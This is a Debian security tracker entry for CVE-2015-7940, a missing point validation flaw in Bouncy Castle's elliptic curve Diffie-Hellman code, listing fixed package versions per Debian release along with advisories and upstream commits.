CVE-2015-7940

NameCVE-2015-7940
DescriptionThe Bouncy Castle Java library before 1.51 does not validate a point is withing the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an "invalid curve attack."
SourceCVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SuSE, Mageia, GitHub code/issues, web search, more)
ReferencesDLA-361-1, DSA-3417-1
NVD severitymedium (attack range: remote)
Debian Bugs802671

Vulnerable and fixed packages

The table below lists information on source packages.

Source PackageReleaseVersionStatus
bouncycastle (PTS)wheezy1.44+dfsg-3.1+deb7u1fixed
wheezy (security)1.44+dfsg-3.1+deb7u2fixed
jessie (security), jessie1.49+dfsg-3+deb8u2fixed
stretch1.56-1fixed
buster, sid1.57-1fixed

The information below is based on the following data on fixed versions.

PackageTypeReleaseFixed VersionUrgencyOriginDebian Bugs
bouncycastlesource(unstable)1.51-1medium802671
bouncycastlesourcejessie1.49+dfsg-3+deb8u1mediumDSA-3417-1
bouncycastlesourcesqueeze1.44+dfsg-2+deb6u1mediumDLA-361-1
bouncycastlesourcewheezy1.44+dfsg-3.1+deb7u1mediumDSA-3417-1

Notes

https://web-in-security.blogspot.ca/2015/09/practical-invalid-curve-attacks.html
Commits: https://github.com/bcgit/bc-java/commit/5cb2f05
Possibly needed to include as well: https://github.com/bcgit/bc-java/commit/e25e94a
Peter Dettman <peter.dettman@bouncycastle.org> offered to assist if backporting fails and to review the result.

Search for package or bug name: Reporting problems